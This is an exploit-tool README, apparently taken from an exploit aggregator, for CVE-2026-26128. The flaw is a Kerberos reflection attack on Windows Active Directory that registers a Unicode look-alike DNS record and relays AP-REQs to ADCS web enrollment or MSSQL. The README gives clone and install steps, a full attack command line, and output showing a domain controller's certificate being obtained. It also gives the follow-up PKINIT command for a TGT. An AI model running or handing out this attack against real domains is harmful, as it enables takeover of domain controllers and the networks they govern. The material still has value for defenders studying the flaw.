## https://sploitus.com/exploit?id=32B23546-0FA3-5016-BC2F-AA4FAD5FC2BD
# CVE-2026-26128

Python tool to exploit Kerberos reflection via Unicode normalization in Windows Active Directory. Based on research by [Guillaume André / Synacktiv](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part).
### Installation
These tools are only compatible with Python 3.8+. Clone the repository from GitHub, install the dependencies and you should be good to go:
```bash
git clone https://github.com/jarnovandenbrink/CVE-2026-26128.git
cd CVE-2026-26128
pip install -r requirements.txt
```
### Usages
```bash
python3 CVE-2026-26128.py contoso.com/john:password -t http://contoso-dc.contoso.com/certsrv/certfnsh.asp -l 192.168.1.80 -dc-ip 192.168.1.10
[*] Connecting to LDAP on 192.168.1.10
[*] LDAP connection established
[*] Adding DNS record: cⓞntoso-dc.contoso.com
[*] Waiting for DNS propagation... 180s
[*] DNS propagation complete
[*] Setting up SMB Server
[*] SMBD: Received connection from 192.168.1.10
[*] HTTP server returned status code 200, treating as a successful login
[*] [+] Attack worked!
[*] Certificate will be written to: /path/to/CONTOSO-DC.pfx
[*] To request a TGT using PKINIT run:
python3 gettgtpkinit.py contoso.com/CONTOSO-DC$ -cert-pfx /path/to/CONTOSO-DC.pfx -dc-ip 192.168.1.10 out.ccache
[*] GOT CERTIFICATE! ID 16
[*] Writing PKCS#12 certificate to ./CONTOSO-DC.pfx
[*] Certificate successfully written to file
```
Alternatively this attack can be performed against MSSQL and SCCM. Note that for Kerberos relaying to MSSQL the SQL Server must be running as the machine account. Otherwise the AP-REQ won't be decrypted with the right key.
### Exploitation
This tool exploits the way Windows normalizes Unicode characters when resolving SPNs. The `DnsCache` service uses `CompareStringW` with `NORM_IGNORECASE`, which treats `ⓢⓡⓥ1․ⓐⓓ․ⓛⓞⓒⓐⓛ` differently from `srv1.ad.local`, causing it to issue a DNS request. The Domain Controller on the other hand uses `LCMapStringEx` with normalization flags `0x31403`. By registering a DNS record for the Unicode hostname and pointing it to the attacker machine, the AP-REQ can be relayed to any service that does not enforce channel binding or communications integrity.
Supported relay targets are ADCS web enrollment and MSSQL. SCCM AdminService support is planned. Note that SMB relay is no longer possible on systems patched with the March 2026 Patch Tuesday update.